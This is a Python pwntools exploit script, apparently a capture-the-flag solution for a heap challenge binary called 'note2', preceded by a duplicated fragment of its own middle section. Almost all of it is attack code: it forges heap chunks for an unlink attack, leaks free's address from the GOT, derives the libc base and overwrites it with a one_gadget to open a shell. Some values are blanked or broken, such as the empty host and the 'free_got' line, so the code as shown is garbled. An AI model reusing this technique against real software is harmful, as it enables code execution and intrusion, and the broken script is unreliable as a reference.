
    1. io.recvuntil("Input your name:")
    2. io.sendline("abcd")
    3. #bin_sh_addr = 0x6020e0
    4. io.recvuntil("Input your address:")
    5. io.sendline("abcd")
    6. ptr = 0x602120
    7. fd_addr = ptr - 0x18
    8. bk_addr = ptr - 0x10
    9. payload = p64(0)+p64(0xa1)+p64(fd_addr)+p64(bk_addr)
    10. creat(0x80,payload) #0
    11. creat(0,"bbbb") #1
    12. creat(0x80,"cccc") #2
    13. #edit(1,1,"dddddddddddddddd")
    14. delete(1)


    1. from pwn import*
    2. from LibcSearcher import*
    3. context.log_level = 'debug'
    4. #context.arch = 'amd64'
    5. io =process('./note2')
    6. io = remote("",25465)
    7. elf = ELF('./note2')
    8. libc=ELF('/lib/x86_64-linux-gnu/')
    9. libc = ELF('')
    10. def debug():
    11. gdb.attach(io)
    12. pause()
    13. def creat(size,value):
    14. io.recvuntil("option--->>")
    15. io.sendline("1")
    16. io.recvuntil("Input the length of the note content:(less than 128)")
    17. io.sendline(str(size))
    18. io.recvuntil("Input the note content:")
    19. io.sendline(value)
    20. def show(id):
    21. io.recvuntil("option--->>")
    22. io.sendline("2")
    23. io.recvuntil("Input the id of the note:")
    24. io.sendline(str(id))
    25. def edit(id,choice,value):
    26. io.recvuntil("option--->>")
    27. io.sendline("3")
    28. io.recvuntil("Input the id of the note:")
    29. io.sendline(str(id))
    30. io.recvuntil("do you want to overwrite or append?[1.overwrite/2.append]")
    31. io.sendline(str(choice))
    32. io.recvuntil("TheNewContents:")
    33. io.sendline(value)
    34. def delete(id):
    35. io.recvuntil("option--->>")
    36. io.sendline("4")
    37. io.recvuntil("Input the id of the note:")
    38. io.sendline(str(id))
    39. io.recvuntil("Input your name:")
    40. io.sendline("abcd")
    41. #bin_sh_addr = 0x6020e0
    42. io.recvuntil("Input your address:")
    43. io.sendline("abcd")
    44. ptr = 0x602120
    45. fd_addr = ptr - 0x18
    46. bk_addr = ptr - 0x10
    47. payload = p64(0)+p64(0xa1)+p64(fd_addr)+p64(bk_addr)
    48. creat(0x80,payload) #0
    49. creat(0,"bbbb") #1
    50. creat(0x80,"cccc") #2
    51. #edit(1,1,"dddddddddddddddd")
    52. delete(1)
    53. payload = p64(0)*2+p64(0xa0)+p64(0x90)
    54. creat(0,payload)
    55. delete(2)
    56. free_got =["free"]
    57. payload = b'a'*24+p64(free_got)
    58. edit(0,1,payload)#3
    59. #debug()
    60. show(0)
    61. #debug()
    62. free_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    63. log.success("free_addr---------->"+hex(free_addr))
    64. libcbase = free_addr - libc.sym["free"]
    65. log.success("libcbase---------->"+hex(libcbase))
    66. #debug()
    67. system_addr = libcbase +libc.sym["system"]
    68. one_gadget = [0x45216,0x4526a,0xf02a4]
    69. payload= p64(one_gadget[2]+libcbase)
    70. edit(0,1,payload)
    71. #delete(0)
    72. io.interactive()
